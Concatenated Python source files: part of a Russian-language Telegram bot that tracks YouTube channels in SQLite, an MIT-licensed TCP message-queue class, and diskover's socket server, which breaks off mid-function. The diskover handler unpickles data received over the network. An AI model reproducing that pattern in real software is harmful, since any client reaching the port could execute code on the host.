BOT.send_message(message.chat.id, "Канал уже есть в базе")
except:
BOT.send_message(message.chat.id, "Вы ввели неправильные данные")
@logger.catch
def query_delete_channel(message):
"""Функция ожидает название канала для удаления и переходит
к следующей функции, которая удаляет канал"""
msg = BOT.send_message(
message.chat.id,
"Введите канал для удаления:",
)
BOT.register_next_step_handler(msg, delete_channel)
@logger.catch
def delete_channel(message):
"""Функция удаляет канал из базы данных"""
conn = get_connection()
c = conn.cursor()
channel_name = message.text
c.execute("SELECT title FROM channel_list WHERE title IS NOT NULL")
(base) = c.fetchall()
all_names = []
for name in base:
all_names.append("".join(name))
if channel_name in all_names:
c.execute(
"DELETE FROM channel_list WHERE title IN (?) AND url NOT NULL;", (channel_name,)
)
BOT.send_message(message.chat.id, f"Канал '{channel_name}' удалён.")
conn.commit()
else:
BOT.send_message(
message.chat.id, "В вашей базе нет такого канала, начните заново."
)
@logger.catch
def add_url_new_videos(message):
"""Функция ожидаает ссылку с видео и переходит в функции,
которая добавляет эту ссылку в БД"""
BOT.send_message(
message.chat.id, "Отправьте ссылку на видео, я добавлю его в базу."
)
BOT.register_next_step_handler(message, add_new_video)
@logger.catch
def add_new_video(message):
"""Функция добавляет новое видео в БД"""
conn = get_connection()
c = conn.cursor()
if message.text.startswith(
"https://www.youtube.com/watch"
) or message.text.startswith("https://youtu.be/"):
BOT.send_photo(
message.chat.id, photo=PHOTO_ERIC_THINKING, caption="Я думаю..."
)
sleep(1.5)
video_url = message.text
if len(message.text.split("/")):
if "=" in message.text:
cut_link = message.text.split("=")
eng_channel_name = cut_link[1]
else:
cut_link = message.text.split("/")[3:]
eng_channel_name = cut_link[0]
response = requests.get(
GET_CHANNEL_ID_FROM_VIDEO
+ eng_channel_name
+ "&key="
+ GOOGLE_API_KEY
)
channel_name = response.json()["items"][0]["snippet"]["channelTitle"]
c.execute(
"CREATE TABLE query_channel AS SELECT title, rating\
FROM channel_list\
GROUP BY title\
HAVING rating NOT NULL"
)
c.execute(
"INSERT INTO channel_list (title, video_url) VALUES (?, ?);",
(channel_name, video_url),
)
c.executescript(
"UPDATE channel_list\
SET rating =\
(SELECT rating FROM query_channel\
WHERE channel_list.title = query_channel.title);\
UPDATE channel_list\
SET rating = 0\
WHERE (rating IS NULL)"
)
c.execute("DROP TABLE query_channel")
BOT.send_message(message.chat.id, "Видео добавлено.")
conn.commit()
else:
BOT.send_message(
message.chat.id, "Вы отправили неверную ссылку, начните сначала."
)
@logger.catch
def delete_video(message, video_url):
"""Функция удаления видео из базы"""
conn = get_connection()
c = conn.cursor()
c.execute("DELETE FROM channel_list WHERE video_url IN (?);", (video_url,))
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
markup.add(types.InlineKeyboardButton(text="👉 Следующее видео"))
BOT.send_message(message.chat.id, "Видео удалено.", reply_markup=markup)
conn.commit()
@logger.catch
def deferral_video(message, video_url):
"""Функция пропустить видео"""
conn = get_connection()
c = conn.cursor()
c.execute(
"UPDATE channel_list SET rating = Null WHERE video_url IN(?);",
(video_url,),
)
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
markup.add(types.InlineKeyboardButton(text="👉 Следующее видео"))
BOT.send_message(message.chat.id, "Видео отложено.", reply_markup=markup)
conn.commit()
@logger.catch
def post_videos_to_watch(message):
"""Функция достаёт из базы все видео и выдаёт их в очереди по одному"""
conn = get_connection()
c = conn.cursor()
c.execute(
"SELECT DISTINCT(video_url)\
FROM channel_list\
WHERE video_url NOT NULL\
ORDER BY rating DESC"
)
(urls) = c.fetchall()
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
if urls:
all_urls = []
for url in urls:
all_urls.append("".join(url))
for url in all_urls:
BOT.send_message(message.chat.id, url)
markup.add(types.InlineKeyboardButton(text="👉 Отложить видео"))
markup.add(types.InlineKeyboardButton(text="❌ Удалить видео"))
markup.add(types.InlineKeyboardButton(text="👈 Вернуться в меню"))
msg = BOT.send_message(
message.chat.id, "Выберите действие:", reply_markup=markup
)
BOT.register_next_step_handler(msg, process_step, url)
break
else:
BOT.send_message(
message.chat.id, "В базе не осталось видео для просмотра."
)
markup.add(types.InlineKeyboardButton(text="👈 Вернуться в меню"))
BOT.send_message(message.chat.id, "Конец.", reply_markup=markup)
BOT.register_next_step_handler(message, selects_actions)
@logger.catch
def parsing_new_video_from_channel():
"""Функция достаёт из базы все имеющиеся каналы,
проверяет есть ли на каналах новые видео"""
threading.Timer(86400, parsing_new_video_from_channel).start()
conn = get_connection()
c = conn.cursor()
c.execute("SELECT title, url FROM channel_list WHERE url NOT NULL")
(channel_name_and_url) = c.fetchall()
for title, url in channel_name_and_url:
logger.info("Bot trying to get videos")
sleep(2)
if len(url.split("/")):
cut_link = url.split("/")[4:]
eng_channel_name = cut_link[0]
name_length = len(eng_channel_name)
if name_length < 24:
get_channel_info = requests.get(
GET_CHANNEL_BY_USERNAME
+ eng_channel_name
+ "&key="
+ GOOGLE_API_KEY
)
else:
get_channel_info = requests.get(
GET_CHANNEL_BY_ID + eng_channel_name + "&key=" + GOOGLE_API_KEY
)
if "items" not in get_channel_info:
get_channel_info = requests.get(
SEARCH_BROKEN_CHANNEL
+ eng_channel_name
+ "&key="
+ GOOGLE_API_KEY
)
channel_name = get_channel_info.json()["items"][0]["snippet"][
"channelTitle"
]
channel_id = get_channel_info.json()["items"][0]["snippet"][
"channelId"
]
else:
channel_name = get_channel_info.json()["items"][0]["snippet"][
"title"
]
channel_id = get_channel_info.json()["items"][0]["id"]
search_new_video = requests.get(
SEARCH_VIDEO_BY_CHANNEL_ID
+ channel_id
+ "&maxResults=30&key="
+ GOOGLE_API_KEY
)
date_of_publication = search_new_video.json()["items"][0]["snippet"][
"publishedAt"
][:10]
video_id = search_new_video.json()["items"][0]["id"]
video_id_in_broken_channels = search_new_video.json()["items"][1]["id"]
if "videoId" in video_id:
new_video = YOUTUBE_URL + video_id["videoId"]
else:
new_video = YOUTUBE_URL + video_id_in_broken_channels["videoId"]
date_today = str(dt.date.today())
if date_of_publication == date_today:
c.execute(
"CREATE TABLE query_channel AS SELECT title, rating\
FROM channel_list\
GROUP BY title\
HAVING rating NOT NULL"
)
c.execute(
"INSERT INTO channel_list (video_url, title)\
VALUES (?, ?);",
(new_video, channel_name),
)
c.execute(
"UPDATE channel_list\
SET rating =\
(SELECT rating FROM query_channel\
WHERE channel_list.title = query_channel.title)"
)
c.execute("DROP TABLE query_channel")
sleep(1)
logger.info("Bot added video")
conn.commit()
else:
logger.info("No new videos were found")
logger.info("Parsing done")
if __name__ == "__main__":
logger.info("Bot started work")
while True:
try:
init_db()
thread2 = threading.Thread(target=parsing_new_video_from_channel)
thread2.start()
sleep(15)
thread1 = threading.Thread(target=BOT.polling, kwargs={"none_stop": True})
thread1.start()
except Exception as error:
logger.error(error)
BOT.send_message(TELEGRAM_CHAT_ID, f"Error at startup {error}")
sleep(30)
|
msg_entity.py
|
"""
MIT License
Copyright (c) 2018 AlessioNetti
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import select, socket, threading
import struct, json, logging
from fault_injector.util.misc import getipport, formatipport, DummySocketBuilder
from threading import Semaphore
from collections import deque
from time import time
from abc import ABC, abstractmethod
class MessageEntity(ABC):
"""
Abstract class that supplies a basic message-based communication protocol based on TCP sockets.
This class supports one-to-many communication with broadcast capabilities, and implements a message queue.
Messages must be supplied as dictionaries of arbitrary length, which will be converted to json.
Users must implement the 'listen' abstract method, in which the behavior of the listener is implemented. This
is relevant depending on the nature of the communication entity (client or server).
"""
# Logger for the class
logger = logging.getLogger('MessageEntity')
# ID used to identify outbound broadcast messages
BROADCAST_ID = '*'
DUMMY_STR = b'-'
# Static definitions for messages regarding the status of a connection
CONNECTION_FINALIZED_MSG = -1
CONNECTION_LOST_MSG = 0
CONNECTION_RESTORED_MSG = 1
CONNECTION_TOREMOVE_MSG = 2
@staticmethod
def is_status_message(msg):
"""
Inspects the type of a message received on the queue, and determines if it is a status message
When connections are lost or restored, status messages are injected into the input queue in order to
asynchronously signal the status change. This method allows to determine if a message in the queue is of
such type.
:param msg: The message to be inspected
:return: A tuple: the first element is True if msg is a status message, and the second expresses the
status change of the connection (depending on the constants defined above)
"""
if isinstance(msg, type(MessageEntity.CONNECTION_RESTORED_MSG)):
return True, msg
else:
return False, None
def __init__(self, socket_timeout=10, max_connections=100, re_send_msgs=False):
"""
Constructor of the class
:param socket_timeout: timeout for the underlying sockets
:param max_connections: maximum number of concurrent connections (used for servers only)
:param re_send_msgs: if True, the entity will keep track of sent/received messages, and eventually attempt
to resend them to hosts that have not received them due to a connection loss
"""
# The thread object for the listener and a termination flag
self._thread = None
self._initialized = False
self._hasToFinish = False
self.reSendMsgs = re_send_msgs
# Counter that keeps track of the current sequence number for sent messages
self._curr_seq_num = 0
# This timestamp is used to identify the session messages were sent in. If the server restarts, this number will
# increase, allowing to distinguish messages with the same sequence number
self._curr_seq_ts = int(time())
self._seq_num_lim = 4000000000
# Timeout to be used for the sockets
self.sock_timeout = socket_timeout
# Maximum number of requests for server sockets
self.max_connections = max_connections
# The dictionary of sockets registered for communication, whether server or client
# The keys are in the form of (ip, port) tuples
self._registeredHosts = {}
# The list of hosts registered for the 'select' calls (also includes the server socket, if present)
self._readSet = []
# Input and output message queues
self._inputQueue = deque()
self._outputQueue = deque()
# Locks for access to input and output queues
self._inputLock = threading.Lock()
self._outputLock = threading.Lock()
# This socket is used to wake up the messaging thread when there are outbound messages to be sent
reads, writes = DummySocketBuilder.getDummySocket()
self._dummy_sock_r = reads
self._dummy_sock_w = writes
# Semaphore for producer-consumer style computation on the message queue
self._messageSem = Semaphore(0)
# A list that stores the history of sent messages
self._historyLen = 4096
self._msgHistory = deque(maxlen=self._historyLen)
def start(self):
"""
Method that starts the listener thread
"""
if not self._initialized:
self._thread = threading.Thread(target=self._listen)
self._initialized = True
self._hasToFinish = False
self._thread.start()
MessageEntity.logger.debug('Messaging thread successfully started')
else:
MessageEntity.logger.warning('Cannot start messaging thread if it is already running')
def stop(self):
"""
Method that terminates the listener thread
"""
if self._initialized:
self._hasToFinish = True
self._thread.join()
self._thread = None
self._initialized = False
MessageEntity.logger.debug('Messaging thread successfully stopped')
def get_registered_hosts(self):
"""
Returns a list of (ip, port) addresses with which communication is currently active
"""
return list(self._registeredHosts.keys())
def get_n_registered_hosts(self):
"""
Returns the number of currently connected hosts
:return: the number of currently connected hosts
"""
return len(self._registeredHosts)
def send_msg(self, addr, comm):
"""
Public method for sending messages; hosts are identified by their (ip, port) address tuples
:param addr: the address (ip, port) tuple of the target host
:param comm: The message to be sent
"""
if comm is None or not isinstance(comm, dict):
MessageEntity.logger.error('Messages must be supplied as dictionaries to send_msg')
return
self._outputLock.acquire()
self._outputQueue.append((addr, comm))
self._outputLock.release()
# Writing to the internal socket to wake up the server if it is waiting on a select call
self._dummy_sock_w.send(MessageEntity.DUMMY_STR)
def broadcast_msg(self, comm):
"""
Public method for broadcasting messages
:param comm: The message to be sent
"""
if comm is None or not isinstance(comm, dict):
MessageEntity.logger.error('Messages must be supplied as dictionaries to send_msg')
return
addr = (MessageEntity.BROADCAST_ID, MessageEntity.BROADCAST_ID)
self._outputLock.acquire()
self._outputQueue.append((addr, comm))
self._outputLock.release()
# Writing to the internal pipe to wake up the server if it is waiting on a select call
self._dummy_sock_w.send(MessageEntity.DUMMY_STR)
def peek_msg_queue(self):
"""
Returns the length of the message queue
:return: The length of the message queue
"""
return len(self._inputQueue)
def pop_msg_queue(self, blocking=True):
"""
Pops the first element of the message queue
:param blocking: boolean flag. If True, the method is blocking, and the process is halted until a new message
has been received (if the queue is empty)
:return: The first message in the queue
"""
self._messageSem.acquire(blocking)
self._inputLock.acquire()
addr, comm = self._inputQueue.popleft() if len(self._inputQueue) > 0 else (None, None)
self._inputLock.release()
return addr, comm
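# Illustrative consumer loop (editor's sketch, assuming a concrete subclass named "entity"
# that implements _listen()):
#
# addr, msg = entity.pop_msg_queue(blocking=True)
# is_status, status = MessageEntity.is_status_message(msg)
# if is_status:
#     ...  # react to CONNECTION_LOST_MSG / CONNECTION_RESTORED_MSG, etc.
# else:
#     ...  # msg is the dictionary sent by the peer at addr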
def remove_host(self, addr):
"""
Removes a host from the list of active hosts
Public, asynchronous version of the private method
:param addr: The (ip, port) address corresponding to the host to remove
"""
self._outputLock.acquire()
self._outputQueue.append((addr, MessageEntity.CONNECTION_TOREMOVE_MSG))
self._outputLock.release()
def _flush_output_queue(self):
"""
Private method that tries to dispatch all pending messages in the output queue
"""
# Flushing the dummy socket used for triggering select calls
self._dummy_sock_r.recv(2048)
# We compute the number of messages currently in the output queue
n_msg = len(self._outputQueue)
for i in range(n_msg):
addr, msg = self._outputQueue.popleft()
is_status, status = MessageEntity.is_status_message(msg)
if is_status and status == MessageEntity.CONNECTION_TOREMOVE_MSG:
self._remove_host(addr)
else:
seq_num = (self._curr_seq_ts, self._curr_seq_num)
if self.reSendMsgs:
self._msgHistory.append((seq_num, addr, msg))
if addr[0] == MessageEntity.BROADCAST_ID:
to_remove = []
for re_addr in self._registeredHosts.keys():
if not self._send_msg(seq_num, re_addr, msg):
to_remove.append(re_addr)
for re_addr in to_remove:
self._remove_host(re_addr)
else:
if not self._send_msg(seq_num, addr, msg):
self._remove_host(addr)
# The sequence numbers wrap around a certain limit, and return to 0
self._curr_seq_num = (self._curr_seq_num + 1) % self._seq_num_lim
if self._curr_seq_num == 0:
# If the sequence number wraps around its limit, we update the session timestamp
self._curr_seq_ts = int(time())
def _forward_old_msgs(self, start_seq, addr):
"""
        Forwards all messages that were sent in a certain time frame to a host that has recently restored its
connection
:param start_seq: starting sequence number of the forwarding window
:param addr: address of the target host for forwarding
"""
self._outputLock.acquire()
for m_seq_num, m_addr, msg in self._msgHistory:
            # Sequence numbers are (timestamp, counter) tuples, so tuple comparison stays monotonic even after the counter wraps around
if start_seq < m_seq_num and m_addr[0] == MessageEntity.BROADCAST_ID:
self._outputQueue.append((addr, msg))
self._outputLock.release()
def _add_to_input_queue(self, addr, comm):
"""
Adds a message that has been received to the internal message queue
:param addr: The address (ip, port) of the sender host
:param comm: The message to be added to the queue
"""
self._inputQueue.append((addr, comm))
self._messageSem.release()
def _liveness_check(self, sock):
"""
Checks for the liveness of a socket by trying to read 1 byte (with MSG_PEEK). This supposes that the socket has
been flagged as readable by a previous 'select' call
:param sock: the socket to be checked
:return: True if the socket is alive, False otherwise
"""
try:
if len(sock.recv(1, socket.MSG_PEEK)) == 0:
MessageEntity.logger.info('Host %s has disconnected' % getipport(sock))
return False
else:
return True
except Exception:
MessageEntity.logger.info('Host %s has encountered an error' % getipport(sock))
return False
def _send_msg(self, seq_num, addr, comm):
"""
Private method that sends messages over specific active hosts of the registered hosts list
:param seq_num: sequence number of the message to be sent in tuple format
:param addr: address of the target host
:param comm: content of the message. Must be supplied as a dictionary. If None, an empty message with its header
only will be sent: this type of messages is used to identify message forwarding requests, with seq_num
representing the sequence number of the last valid message received from the host
:return: True if the message was successfully sent, False otherwise
"""
# Verifying if the input address has a corresponding open socket
try:
sock = self._registeredHosts[addr]
except KeyError:
sock = None
# If no valid socket was found for the input address, the message is not sent
if sock is None:
MessageEntity.logger.error('Cannot send to %s, is not registered' % formatipport(addr))
return False
if comm is None:
# An empty message containing only the header represents a message forwarding request
msg = struct.pack('>I', 0) + struct.pack('>I', seq_num[0]) + struct.pack('>I', seq_num[1])
else:
msg = json.dumps(comm).encode()
# Prefix each message with a 4-byte length (network byte order)
msg = struct.pack('>I', len(msg)) + struct.pack('>I', seq_num[0]) + struct.pack('>I', seq_num[1]) + msg
try:
sock.sendall(msg)
if self.reSendMsgs and comm is not None:
self._update_seq_num(addr, seq_num, received=False)
return True
except Exception:
MessageEntity.logger.error('Exception encountered while sending msg to %s' % getipport(sock))
# If an error is encountered during communication, we suppose the host is dead
return False
def _recv_msg(self, sock):
"""
Performs the reception of a message from a given socket. This supposes that the socket has been already flagged
as readable by a previous 'select' call
:param sock: the socket from which the message must be read
:return: A tuple containing the message dictionary and the sequence number of the associated message. If the
message is a forwarding request, the message will be None, and the sequence number will represent the last
valid message that was received by the sender from this host.
"""
# Read message length and unpack it into an integer
raw_msglen = self._recvall(sock, 4)
if not raw_msglen:
            MessageEntity.logger.error('Corrupt message received from %s' % getipport(sock))
return None, None
# Read message sequence number
raw_seqnum_ts = self._recvall(sock, 4)
raw_seqnum = self._recvall(sock, 4)
msglen = struct.unpack('>I', raw_msglen)[0]
seqnum = (struct.unpack('>I', raw_seqnum_ts)[0], struct.unpack('>I', raw_seqnum)[0])
if msglen == 0 and self.reSendMsgs:
# An empty message represents a message forwarding request. Such requests are NOT put on the queue
return None, seqnum
# Read the message data
raw_msg = self._recvall(sock, msglen)
try:
final_msg = json.loads(raw_msg.decode()) if raw_msg else None
except json.JSONDecodeError:
final_msg = None
if final_msg is not None and self.reSendMsgs:
self._update_seq_num(sock.getpeername(), seqnum, received=True)
return final_msg, seqnum
def _recvall(self, sock, n):
"""
Method that performs a series of reads on a socket in order to reach the (known) length of a received package
The length of the message is always known since it is a part of the header in our protocol.
:param sock: The socket from which the message must be received
:param n: The length of the message
"""
# Helper function to recv n bytes or return None if EOF is hit
data = b''
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data += packet
return data
def _register_host(self, connection, overwrite=False):
"""
        Adds a host for which a connection was successfully established to the list of active hosts
:param connection: the socket object corresponding to the host
:param overwrite: if True, connections will be overwritten by new connections to the same host
"""
addr = connection.getpeername()
if addr not in self._registeredHosts or overwrite:
self._registeredHosts[addr] = connection
self._update_read_set()
else:
connection.close()
MessageEntity.logger.error('Cannot register host %s, is already registered' % formatipport(addr))
def _remove_host(self, address):
"""
        Removes a host from the list of active hosts
:param address: The (ip, port) address corresponding to the host to remove
"""
if address in self._registeredHosts:
self._registeredHosts[address].close()
self._registeredHosts.pop(address, None)
self._update_read_set()
else:
MessageEntity.logger.error('Cannot remove host %s, does not exist' % formatipport(address))
def _trim_dead_sockets(self):
"""
This method removes all sockets that are in error state from the list of active hosts
Must be called every time a 'select' call fails.
"""
        # Iterate over a copy of the items, since _remove_host mutates the dict
        for addr, sock in list(self._registeredHosts.items()):
            try:
                # We perform one select call on each active socket, and if an error is encountered,
                # the host is removed
                select.select([sock], [], [], 0)
            except select.error:
                MessageEntity.logger.warning('Removing host %s due to errors' % getipport(sock))
                self._remove_host(addr)
def _update_read_set(self):
"""
        Updates the list of sockets enabled for reading in the 'select' calls
"""
self._readSet = [self._dummy_sock_r] + list(self._registeredHosts.values())
@abstractmethod
def _listen(self):
"""
The listener method that is run by the thread for this class. Must implement the actual communication behavior
(client, server, or other) of subclasses.
"""
raise NotImplementedError('This method must be implemented')
@abstractmethod
def _update_seq_num(self, addr, seq_num, received=True):
"""
Refreshes the sequence number associated to a certain connected host
:param addr: The address of the connected host
:param seq_num: The sequence number associated to the connected host, in tuple format
        :param received: If True, the sequence number refers to a received message; otherwise it refers to a sent message
"""
raise NotImplementedError('This method must be implemented')
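
# Hedged sketch (not part of the original class): _send_msg/_recv_msg above frame every
# message as a 12-byte big-endian header (payload length, session timestamp, sequence
# number) followed by the JSON payload. The helper names below are illustrative only and
# simply mirror that wire format; json and struct are used by the class above, so they
# are assumed to be imported at the top of this module.

def pack_frame_example(seq_ts, seq_num, payload_dict):
    # Serialize the payload and prepend the same '>I' length + sequence header
    body = json.dumps(payload_dict).encode()
    return struct.pack('>III', len(body), seq_ts, seq_num) + body


def unpack_header_example(raw_header):
    # Returns (msglen, seq_ts, seq_num), matching what _recv_msg reads back
    return struct.unpack('>III', raw_header)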
|
diskover_socket_server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""diskover - Elasticsearch file system crawler
diskover is a file system crawler that indexes
your file metadata into Elasticsearch.
See README.md or https://github.com/shirosaidev/diskover
for more information.
Copyright (C) Chris Park 2017-2018
diskover is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
from diskover import q_crawl, adaptive_batch, config, get_time
from diskover_bot_module import scrape_tree_meta
import socket
import subprocess
try:
import queue as Queue
except ImportError:
import Queue
import threading
import uuid
import json
import time
import sys
import pickle
import struct
# dict to hold socket tasks
socket_tasks = {}
# list of socket client
clientlist = []
def socket_thread_handler(threadnum, q, cliargs, logger):
"""This is the socket thread handler function.
It runs the command msg sent from client.
"""
BUFF = 1024
while True:
try:
c = q.get()
clientsock, addr = c
logger.debug(clientsock)
logger.debug(addr)
data = clientsock.recv(BUFF)
data = data.decode('utf-8')
logger.debug('received data: %s' % data)
if not data:
q.task_done()
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
continue
# check if ping msg
if data == 'ping':
logger.info("[thread-%s]: Got ping from %s" % (threadnum, str(addr)))
# send pong reply
message = b'pong'
clientsock.send(message)
logger.debug('sending data: %s' % message)
else:
# strip away any headers sent by curl
data = data.split('\r\n')[-1]
logger.info("[thread-%s]: Got command from %s" % (threadnum, str(addr)))
# load json and store in dict
command_dict = json.loads(data)
logger.debug(command_dict)
# run command from json data
run_command(threadnum, command_dict, clientsock, cliargs, logger)
q.task_done()
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
except (ValueError, TypeError) as e:
q.task_done()
logger.error("[thread-%s]: Invalid JSON from %s: (%s)" % (threadnum, str(addr), e))
message = b'{"msg": "error", "error": "Invalid JSON caused by %s"}\n' % str(e).encode('utf-8')
clientsock.send(message)
logger.debug(message)
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
pass
except socket.error as e:
q.task_done()
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
pass
def recvall(sock, count):
buf = b''
while count:
newbuf = sock.recv(count)
if not newbuf: return None
buf += newbuf
count -= len(newbuf)
return buf
def recv_one_message(sock):
lengthbuf = recvall(sock, 4)
if not lengthbuf:
return None
length, = struct.unpack('!I', lengthbuf)
return recvall(sock, length)
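
# Hedged sketch: recv_one_message() above expects a 4-byte '!I' length prefix before each
# payload. The matching send side (as a diskover treewalk client would presumably
# implement it; it is not part of this file) can be written as:
def send_one_message_example(sock, data):
    # Prefix the payload with its length so recv_one_message() can frame it
    sock.sendall(struct.pack('!I', len(data)) + data)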
def socket_thread_handler_twc(threadnum, q, q_kill, lock, rootdir, num_sep, level,
batchsize, cliargs, logger, reindex_dict):
"""This is the socket thread handler tree walk client function.
Stream of directory listings (pickle) from diskover treewalk
client connections are enqueued to redis rq queue.
"""
while True:
try:
c = q.get()
clientsock, addr = c
logger.debug(clientsock)
logger.debug(addr)
totalfiles = 0
while True:
data = recv_one_message(clientsock)
if not data:
break
if data == b'SIGKILL' or data == 'SIGKILL':
q_kill.put(b'SIGKILL')
break
# unpickle data sent from client
data_decoded = pickle.loads(data)
logger.debug(data_decoded)
# enqueue to redis
batch = []
for root, dirs, files in data_decoded:
files_len = len(files)
totalfiles += files_len
# check for empty dirs
if len(dirs) == 0 and len(files) == 0 and not cliargs['indexemptydirs']:
continue
batch.append((root, dirs, files))
batch_len = len(batch)
if batch_len >= batchsize or (cliargs['adaptivebatch'] and totalfiles >= config['adaptivebatch_maxfiles']):
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,),
result_ttl=config['redis_ttl'])
if cliargs['debug'] or cliargs['verbose']:
logger.info("enqueued batchsize: %s (batchsize: %s)" % (batch_len, batchsize))
del batch[:]
totalfiles = 0
if cliargs['adaptivebatch']:
batchsize = adaptive_batch(q_crawl, cliargs, batchsize)
if cliargs['debug'] or cliargs['verbose']:
logger.info("batchsize set to: %s" % batchsize)
if len(batch) > 0:
# add any remaining in batch to queue
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,), result_ttl=config['redis_ttl'])
del batch[:]
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
q.task_done()
except socket.error as e:
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
def start_socket_server(cliargs, logger):
"""This is the start socket server function.
It opens a socket and waits for remote commands.
"""
global clientlist
# set thread/connection limit
max_connections = config['listener_maxconnections']
# Queue for socket threads
q = Queue.Queue(maxsize=max_connections)
try:
# create TCP socket object
serversock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = config['listener_host'] # default is localhost
port = config['listener_port'] # default is 9999
# bind to port
serversock.bind((host, port))
# start listener
serversock.listen(max_connections)
# set up the threads and start them
for i in range(max_connections):
# create thread
t = threading.Thread(target=socket_thread_handler, args=(i, q, cliargs, logger,))
t.daemon = True
t.start()
while True:
logger.info("Waiting for connection, listening on %s port %s TCP (ctrl-c to shutdown)"
% (str(host), str(port)))
# establish connection
clientsock, addr = serversock.accept()
logger.debug(clientsock)
logger.debug(addr)
logger.info("Got a connection from %s" % str(addr))
# add client to list
client = (clientsock, addr)
clientlist.append(client)
# add task to Queue
q.put(client)
except socket.error as e:
serversock.close()
logger.error("Error opening socket (%s)" % e)
sys.exit(1)
except KeyboardInterrupt:
print('\nCtrl-c keyboard interrupt received, shutting down...')
q.join()
serversock.close()
sys.exit(0)
def start_socket_server_twc(rootdir_path, num_sep, level, batchsize, cliargs, logger, reindex_dict):
"""This is the start socket server tree walk function.
It opens a socket and waits for diskover tree walk client
connections.
"""
global clientlist
# set thread/connection limit
max_connections = config['listener_maxconnections']
# Queue for socket threads
q = Queue.Queue(maxsize=max_connections)
q_kill = Queue.Queue()
lock = threading.Lock()
try:
# create TCP socket object
serversock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = config['listener_host'] # default is localhost
if cliargs['twcport']:
port = cliargs['twcport']
else:
port = config['listener_twcport'] # default is 9998
# bind to port
serversock.bind((host, port))
# start listener
serversock.listen(max_connections)
# set up the threads and start them
for i in range(max_connections):
t = threading.Thread(
target=socket_thread_handler_twc,
args=(i, q, q_kill, lock, rootdir_path, num_sep,
level, batchsize, cliargs, logger, reindex_dict,))
t.daemon = True
t.start()
starttime = time.time()
while True:
if q_kill.qsize() > 0:
logger.info("Received signal to shutdown socket server")
q.join()
serversock.close()
return starttime
logger.info("Waiting for connection, listening on %s port %s TCP (ctrl-c to shutdown)"
% (str(host), str(port)))
# establish connection
clientsock, addr = serversock.accept()
logger.debug(clientsock)
logger.debug(addr)
logger.info("Got a connection from %s" % str(addr))
# add client to list
client = (clientsock, addr)
clientlist.append(client)
# set start time to first connection
if len(clientlist) == 1:
starttime = time.time()
# put client into Queue
q.put(client)
except socket.error as e:
serversock.close()
logger.error("Error opening socket (%s)" % e)
sys.exit(1)
except KeyboardInterrupt:
print('\nCtrl-c keyboard interrupt received, shutting down...')
serversock.close()
sys.exit(0)
def run_command(threadnum, command_dict, clientsock, cliargs, logger):
"""This is the run command function.
It runs commands from the listener socket
using values in command_dict.
"""
global socket_tasks
global clientlist
# try to get index name from command or use from diskover config file
try:
index = str(command_dict['index'])
except KeyError:
index = str(config['index'])
pass
# try to get worker batch size from command or use default
try:
batchsize = str(command_dict['batchsize'])
except KeyError:
batchsize = str(cliargs['batchsize'])
pass
# try to get adaptive batch option from command or use default
try:
adaptivebatch = str(command_dict['adaptivebatch'])
except KeyError:
adaptivebatch = str(cliargs['adaptivebatch'])
pass
try:
action = command_dict['action']
pythonpath = config['python_path']
diskoverpath = config['diskover_path']
# set up command for different action
if action == 'crawl':
path = command_dict['path']
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-q']
elif action == 'finddupes':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--finddupes', '-q']
elif action == 'hotdirs':
index2 = str(command_dict['index2'])
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--hotdirs', index2, '-q']
elif action == 'reindex':
try:
recursive = command_dict['recursive']
except KeyError:
recursive = 'false'
pass
path = command_dict['path']
if recursive == 'true':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-R', '-q']
else:
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-r', '-q']
elif action == 'updatedirsizes':
try:
recursive = command_dict['recursive']
except KeyError:
recursive = 'false'
pass
if recursive == 'true':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--dircalcsonly', '-q']
else:
path = command_dict['path']
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '--dircalcsonly', '--maxdcdepth', '0', '-q']
elif action == 'kill':
taskid = command_dict['taskid']
